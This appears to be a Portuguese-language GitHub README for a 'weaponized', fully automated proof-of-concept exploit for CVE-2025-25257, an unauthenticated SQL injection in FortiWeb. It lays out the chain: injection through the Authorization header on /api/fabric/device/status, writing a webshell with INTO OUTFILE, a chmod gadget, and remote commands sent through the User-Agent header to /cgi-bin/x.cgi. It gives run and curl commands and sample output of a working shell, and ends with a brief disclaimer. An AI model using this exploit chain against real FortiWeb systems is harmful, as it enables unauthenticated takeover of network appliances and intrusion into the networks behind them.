
PoC para CVE-2025-25257, uma injeção SQL crítica não autenticada no FortiWeb. Explora SQLi através do cabeçalho Authorization para escrever um webshell e obter RCE. Não requer login. Totalmente automatizado.
Injeção SQL Crítica → Execução de Webshell
Discovered and weaponized by 0xgh057r3c0n
O CVE-2025-25257 afeta sistemas FortiWeb que expõem o endpoint /api/fabric/device/status, o qual não sanitiza adequadamente a entrada do cabeçalho Authorization.
Um atacante pode realizar injeção SQL não autenticada para escrever um webshell no servidor e executar comandos remotamente.
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>
SQL INTO OUTFILE para soltar shellpython3 CVE-2025-25257.py -t https://target-host.com
Em seguida:
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi
requestsInstalação:
pip install requests
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)
[+] Webshell Ready:
> https://target-host.com/cgi-bin/x.cgi
> Send commands via User-Agent header
| Métrica | Valor |
|---|---|
| Pontuação Base | 9.8 (CRÍTICO) |
| Vetor de Ataque | Rede |
| Privilégios Necessários | Nenhum |
| Interação do Usuário | Nenhuma |
| Impacto | Alto (C/I/A) |
0xgh057r3c0n 🔗 github.com/0xgh057r3c0n
Este proof-of-concept é apenas para fins educacionais e testes autorizados. Use por sua conta e risco. O autor não é responsável pelo uso indevido.